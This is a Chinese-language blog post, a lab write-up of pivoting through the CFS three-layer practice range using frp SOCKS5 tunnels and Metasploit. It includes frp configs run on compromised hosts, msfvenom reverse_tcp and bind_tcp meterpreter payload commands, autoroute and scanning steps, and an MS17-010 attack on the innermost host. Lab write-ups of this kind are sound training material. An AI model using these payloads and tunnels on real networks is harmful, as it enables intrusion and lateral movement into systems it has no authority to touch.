<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#6c599f">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/./images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/./images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/./images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/./images/safari-pinned-tab-next.svg" color="#6c599f">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=EB Garamond, Noto Serif SC:300,300italic,400,400italic,700,700italic|Long Cang:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"localhost","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言再一次CTF比赛中遇到了三四层穿透的靶场，当时由于没有外网，而且也不知道什么网络原因导致穿透三层的时候一直没成功。这个假期正好有时间就找了一个靶场，看看多层的穿透到底应该怎么来比较方便。 靶场选取的是CFS三层靶场，网上一搜就有，这里不再提供下载链接了。 环境搭建网络环境这里是三层网络环境，设置了三个vmnet:">
<meta property="og:type" content="article">
<meta property="og:title" content="CFS三层靶场的穿透实践">
<meta property="og:url" content="http://localhost:4000/posts/CFS%E4%B8%89%E5%B1%82%E9%9D%B6%E5%9C%BA%E7%9A%84%E7%A9%BF%E9%80%8F%E5%AE%9E%E8%B7%B5/">
<meta property="og:site_name" content="匆匆那年">
<meta property="og:description" content="前言再一次CTF比赛中遇到了三四层穿透的靶场，当时由于没有外网，而且也不知道什么网络原因导致穿透三层的时候一直没成功。这个假期正好有时间就找了一个靶场，看看多层的穿透到底应该怎么来比较方便。 靶场选取的是CFS三层靶场，网上一搜就有，这里不再提供下载链接了。 环境搭建网络环境这里是三层网络环境，设置了三个vmnet:">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005202301343.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005205842224.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005204356532.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005204428521.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005204655512.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005204750956.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005204841173.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005205636335.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005210019571.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221005210059941.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006111135484.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006111234927.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006112132980.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006112417935.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006112507814.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006112657017.png">
<meta property="og:image" content="http://localhost:4000/images/pages/image-20221006113952985.png">
<meta property="article:published_time" content="2022-10-05T09:27:07.000Z">
<meta property="article:modified_time" content="2022-10-08T06:56:29.241Z">
<meta property="article:author" content="Geez">
<meta property="article:tag" content="内网安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://localhost:4000/images/pages/image-20221005202301343.png">

<link rel="canonical" href="http://localhost:4000/posts/CFS%E4%B8%89%E5%B1%82%E9%9D%B6%E5%9C%BA%E7%9A%84%E7%A9%BF%E9%80%8F%E5%AE%9E%E8%B7%B5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CFS三层靶场的穿透实践 | 匆匆那年</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">匆匆那年</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">钟声敲在你我耳边</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-fas fa-home"></i>首页</a>

  </li>
        
            
  <li class="menu-item menu-item-overview">

    <a href="/overview/" rel="section"><i class="fa fa-fw fa-fas fa-archive"></i>总览</a>

  </li>


      
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-fas fa-location-arrow"></i>关于</a>

  </li>
        <li class="menu-item menu-item-friends">

    <a href="/friends/" rel="section"><i class="fa fa-fw fa-fas fa-heart"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://localhost:4000/posts/CFS%E4%B8%89%E5%B1%82%E9%9D%B6%E5%9C%BA%E7%9A%84%E7%A9%BF%E9%80%8F%E5%AE%9E%E8%B7%B5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Geez">
      <meta itemprop="description" content="黑客,诗人,养龟仔">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="匆匆那年">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CFS三层靶场的穿透实践
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发布：</span>

              <time title="创建时间：2022-10-05 17:27:07" itemprop="dateCreated datePublished" datetime="2022-10-05T17:27:07+08:00">2022-10-05</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类：</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/overview/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">内网安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>再一次CTF比赛中遇到了三四层穿透的靶场，当时由于没有外网，而且也不知道什么网络原因导致穿透三层的时候一直没成功。这个假期正好有时间就找了一个靶场，看看多层的穿透到底应该怎么来比较方便。</p>
<p>靶场选取的是CFS三层靶场，网上一搜就有，这里不再提供下载链接了。</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><h3 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h3><p>这里是三层网络环境，设置了三个vmnet: </p>
<p><img data-src="/images/pages/image-20221005202301343.png" alt="image-20221005202301343"></p>
<span id="more"></span>

<h3 id="拓扑图"><a href="#拓扑图" class="headerlink" title="拓扑图"></a>拓扑图</h3><p><img data-src="/images/pages/image-20221005205842224.png" alt="image-20221005205842224"></p>
<p>攻击比较简单不再赘述，这里主要是记录下穿透的方案。我们默认拿到了每一层机器的命令执行权限。其中靶机2和靶机3是无法出网的。</p>
<h2 id="穿透内网"><a href="#穿透内网" class="headerlink" title="穿透内网"></a>穿透内网</h2><h3 id="frp"><a href="#frp" class="headerlink" title="frp"></a>frp</h3><h4 id="首先是一层穿透"><a href="#首先是一层穿透" class="headerlink" title="首先是一层穿透"></a>首先是一层穿透</h4><p>首先我们分别上传frp工具到我们的公网vps和靶机1，然后vps中的server如下设置：</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># frps.ini</span></span><br><span class="line"><span class="section">[common]</span></span><br><span class="line"><span class="attr">bind_port</span> = <span class="number">8700</span></span><br><span class="line"><span class="comment"># 工作台配置，不需要可以不配置</span></span><br><span class="line"><span class="attr">dashboard_port</span> = <span class="number">8500</span></span><br><span class="line"><span class="attr">dashboard_user</span> = admin_xxx</span><br><span class="line"><span class="attr">dashboard_pwd</span> = password_788_xxX</span><br></pre></td></tr></table></figure>
<p>后台启动</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">nohup</span> ./frps -c frps.ini &amp;</span><br></pre></td></tr></table></figure>



<p>我们拿到靶机1的权限后上传frp，并进行如下设置即可穿透内网。</p>
<p>frcp.ini</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># frpc.ini</span></span><br><span class="line"><span class="section">[common]</span></span><br><span class="line"><span class="comment"># 服务端地址</span></span><br><span class="line"><span class="attr">server_addr</span> = vps_ip_addr</span><br><span class="line"><span class="attr">server_port</span> = <span class="number">8700</span></span><br><span class="line"><span class="attr">tls_enable</span> = ture</span><br><span class="line"></span><br><span class="line"><span class="comment"># 使用socks插件和Proxifier工具实现代理功能</span></span><br><span class="line"><span class="section">[plugin_socks]</span></span><br><span class="line"><span class="attr">type</span> = tcp</span><br><span class="line"><span class="attr">remote_port</span> = <span class="number">8600</span></span><br><span class="line"><span class="attr">plugin</span> = socks5</span><br><span class="line"><span class="attr">plugin_user</span> = admin</span><br><span class="line"><span class="attr">plugin_passwd</span> = admin123</span><br><span class="line"><span class="attr">use_encryption</span> = <span class="literal">true</span></span><br><span class="line"><span class="attr">use_compression</span> = <span class="literal">true</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 内网穿透功能  ssh 111.111.111.<span class="doctag">xxx:</span>6000</span></span><br><span class="line"><span class="section">[ssh]</span></span><br><span class="line"><span class="attr">type</span> = tcp</span><br><span class="line"><span class="attr">local_ip</span> = <span class="number">127.0</span>.<span class="number">0.1</span></span><br><span class="line"><span class="attr">local_port</span> = <span class="number">22</span></span><br><span class="line"><span class="attr">remote_port</span> = <span class="number">8601</span></span><br></pre></td></tr></table></figure>

<p>后台启动</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">nohup</span> ./frpc -c frpc.ini &amp;</span><br></pre></td></tr></table></figure>

<p>然后我们使用proxifer工具进行设置：</p>
<p><img data-src="/images/pages/image-20221005204356532.png" alt="image-20221005204356532"></p>
<p>添加应用safari浏览器，然后访问192.168.22.128即可：</p>
<p><img data-src="/images/pages/image-20221005204428521.png" alt="image-20221005204428521"></p>
<p>当然你也可以使用其他工具，或者直接挂一个终端代理：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> all_proxy=socks5://admin:admin123@vps_ip:8608</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pages/image-20221005204655512.png" alt="image-20221005204655512"></p>
<p>现在我们就进入到了第二层，然后通过注入拿到账户密码并登录后台写入模版一句话木马。</p>
<p><img data-src="/images/pages/image-20221005204750956.png" alt="image-20221005204750956"></p>
<p>我们通过添加代理应用antsword到proxifier工具中即可连接第二层的靶机2的木马：</p>
<p><img data-src="/images/pages/image-20221005204841173.png" alt="image-20221005204841173"></p>
<p>下面我们需要考虑如何才能访问到第三层？其实frp是支持这样多层代理的，我们只需要把靶机1当作中继，做一个http的代理，然后在靶机2上开启sockts，具体设置如下。</p>
<p>首先vps上的的frp server服务不需要更改，我们需要在靶机1中同时启动frps和frpc。</p>
<p>其中frps.ini如下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">bind_ip = 192.168.22.131</span><br><span class="line"><span class="comment"># 靶机1的第二个网段ip，靶机2可访问到，在一个网段。</span></span><br><span class="line">bind_port = 7000</span><br></pre></td></tr></table></figure>

<p>其中frpc-proxy.ini如下(原来的frpc.ini也可以继续启动，这样方便随时切换到一层代理):</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># frpc.ini</span></span><br><span class="line">[common]</span><br><span class="line"><span class="comment"># 服务端地址</span></span><br><span class="line">server_addr = vps-ip</span><br><span class="line">server_port = 8700</span><br><span class="line">tls_enable = ture</span><br><span class="line"></span><br><span class="line">[http_proxy]</span><br><span class="line"><span class="built_in">type</span> = tcp</span><br><span class="line">remote_port= 8608</span><br><span class="line"></span><br><span class="line"><span class="comment">#plugin = scoks5 这个不能加了,现在是http中转到代理</span></span><br><span class="line"></span><br><span class="line">local_ip = 192.168.22.131</span><br><span class="line">local_port = 8608</span><br></pre></td></tr></table></figure>

<p>现在我们在我们拿下的靶机2上上传frp，并设置frpc.ini：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = 192.168.22.131</span><br><span class="line">server_port = 7000</span><br><span class="line"></span><br><span class="line">[http_proxy]</span><br><span class="line"><span class="built_in">type</span> = tcp</span><br><span class="line">remote_port = 8608</span><br><span class="line">plugin = socks5</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>启动靶机1的frps frpc 和靶机2的frpc 即可完成代理穿透，这时我们可以设置proxifier工具的代理如下：</p>
<p><img data-src="/images/pages/image-20221005205636335.png" alt="image-20221005205636335"></p>
<p>safari访问成功</p>
<p><img data-src="/images/pages/image-20221005210019571.png" alt="image-20221005210019571"></p>
<p>终端代理也可访问成功</p>
<p><img data-src="/images/pages/image-20221005210059941.png" alt="image-20221005210059941"></p>
<p>可以看到最里面的靶机3了，但是靶机3需要ms17010攻击，在进行ms17010攻击时，代理多次断开，这里就不再展示截图了。所以如果要结合msf使用还是最好使用msf的路由（后面会详细介绍msf的路由穿透）。</p>
<h4 id="frp的缺点"><a href="#frp的缺点" class="headerlink" title="frp的缺点"></a>frp的缺点</h4><p>frp不太稳定 使用msf进行利用永恒之蓝的时候总是断开，所以下面还是介绍下msf如何穿透进入内网。</p>
<p><strong>备注</strong>：frp最好后台启动 要不然终端退出即失效。frp可以启动多个，所以一层二层代理可以同时存在，只要理清楚就好，这样也方便我们随时挂一层代理去访问靶机2重新开启二层代理。</p>
<p>另外，frp是支持多层代理的，可以继续保持前面的frps不变，在靶机三上再次开启和靶机2一样的frps和frpc进行第三层代理。因为这里没有四层环境，也不再截图赘述。**</p>
<p><strong>scokts4代理一般都是走的tcp所以这个代理完使用nmap使用-sT ，别的可能会无法扫描到端口。但是测试过程中发现sockts5是无法进行nmap的端口扫描的 还不知道是什么原因。我这里扫描端口使用的是TCP端口扫描工具，但是sockts5穿透网络进行http访问是没有问题的，而kali和攻击机（macos）使用sockts4进行nmap扫描也是没有问题的,就是需要-sT。</strong></p>
<h3 id="MSF穿透三层内网打445"><a href="#MSF穿透三层内网打445" class="headerlink" title="MSF穿透三层内网打445"></a>MSF穿透三层内网打445</h3><p>这里我们不再赘述如何攻击靶机只谈论如何使用msf攻击第三层的靶机3（windows机器，445存在漏洞）</p>
<p>这里我们在我们的攻击机上启动msfconsole,同时生成一个反向连接的elf木马通过蚁剑上传到靶机1（即192.168.123.29&#x2F;192.168.22.131）上：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.123.221 LPORT=9987 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf &gt;shell.elf </span><br></pre></td></tr></table></figure>

<p>然后我们的msfconsole设置监听,蚁剑执行上线：</p>
<p><img data-src="/images/pages/image-20221006111135484.png" alt="image-20221006111135484"></p>
<p>上线后我们直接添加路由</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s 192.168.22.0/24</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pages/image-20221006111234927.png" alt="image-20221006111234927"></p>
<p>我们使用主机发现模块和端口扫描模块进行内网扫描：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/discovery/*</span><br><span class="line">use auxiliary/scanner/portscan/tcp</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pages/image-20221006112132980.png" alt="image-20221006112132980"></p>
<p>可以发现128这个ip存在多个端口，然后我们拿下128的shell。此时我们使用msfvenom进行一个正向木马的生成：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=9002 -f elf &gt; shell2.elf</span><br></pre></td></tr></table></figure>

<p>msfconsole开启新的监听,然后蚁剑上传并执行得到session：</p>
<p><img data-src="/images/pages/image-20221006112417935.png" alt="image-20221006112417935"></p>
<p>现在我们在此添加路由</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s 192.168.33.0/24</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pages/image-20221006112507814.png" alt="image-20221006112507814"></p>
<p>然后经过主机发现192.168.33.33存在445，尝试一下ms17010:</p>
<p><img data-src="/images/pages/image-20221006112657017.png" alt="image-20221006112657017"></p>
<p>这样我们就打到了第三层的靶机3</p>
<p>所有靶机我们都拿到了：</p>
<p><img data-src="/images/pages/image-20221006113952985.png" alt="image-20221006113952985"></p>
<p><strong>备注</strong>：拿到meterpreter时不要退出使用background后台挂起，否则无法继续渗透。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>frp单层代理确实非常稳定，但是多层代理时并不是很好用，还是推荐使用msf。msf的工具挺齐全的可以基本做到完整的内网穿透利用。当然msf也提供了sockts5的代理，当需要使用的时候可以使用msf进行sockts代理的开启，然后使用proxifier工具进行其他工具的代理使用。在测试过程中发现sockts5的代理无论是msf的还是frp的在进行nmap扫描的时候都会出问题，目前原因还未可知。</p>
<p>下次有时间搞明白为什么sockts5在进行nmap代理的时候无法扫描端口。无论是frp的sockts5还是msf生成的sockts5都存在这个问题。</p>
<h2 id="更新补充"><a href="#更新补充" class="headerlink" title="更新补充"></a>更新补充</h2><p>sockts5代理官方有说明并不能完全支持所有应用，所以sockts5支持nmap是有问题的。<br>另外scokts4可以支持部分扫描 仅可使用-sT参数</p>
<p>详情参考 <a target="_blank" rel="noopener" href="https://security.stackexchange.com/questions/120708/nmap-through-proxy">https://security.stackexchange.com/questions/120708/nmap-through-proxy</a></p>

    </div>

    
    
    


<span style="margin-top:30px; color:var(--blockquote-color); font-size:0.85em">
        <br>
        <span class="post-end-item" title="copyright"">
            <span class="post-end-item-icon" style="margin-right: 3px">
                <i class="fab fa-fw fa-creative-commons"></i>
            </span>
            <span class="post-end-item-text">采用署名-非商业性使用-相同方式共享 4.0（CC BY-NC-SA 4.0）许可协议</span>
        </span>
</span>





<div class="donations">
    <div class="donation-label">「分享也是一种学习」</div>
</div>

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/overview/tags/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" rel="tag"><i class="fa fa-tag"></i> 内网安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/%E7%BD%91%E9%BC%8E%E6%9D%AF-web-wep-AK/" rel="prev" title="网鼎杯web-WP-AK">
      <i class="fa fa-chevron-left"></i> 网鼎杯web-WP-AK
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/xss%E4%B9%8B%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9A%84%E7%BC%96%E7%A0%81%E4%B8%8E%E8%A7%A3%E7%A0%81/" rel="next" title="xss之浏览器的编码与解码">
      xss之浏览器的编码与解码 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-text">环境搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E7%8E%AF%E5%A2%83"><span class="nav-text">网络环境</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8B%93%E6%89%91%E5%9B%BE"><span class="nav-text">拓扑图</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A9%BF%E9%80%8F%E5%86%85%E7%BD%91"><span class="nav-text">穿透内网</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#frp"><span class="nav-text">frp</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A6%96%E5%85%88%E6%98%AF%E4%B8%80%E5%B1%82%E7%A9%BF%E9%80%8F"><span class="nav-text">首先是一层穿透</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#frp%E7%9A%84%E7%BC%BA%E7%82%B9"><span class="nav-text">frp的缺点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MSF%E7%A9%BF%E9%80%8F%E4%B8%89%E5%B1%82%E5%86%85%E7%BD%91%E6%89%93445"><span class="nav-text">MSF穿透三层内网打445</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9B%B4%E6%96%B0%E8%A1%A5%E5%85%85"><span class="nav-text">更新补充</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Geez"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Geez</p>
  <div class="site-description" itemprop="description">黑客,诗人,养龟仔</div>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/geeeez/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;geeeez&#x2F;" rel="noopener" target="_blank"><i class="fa fa-fw fa-fab fa-github"></i></a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2016 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-fas fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Geez</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="站点总字数">197k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:59</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


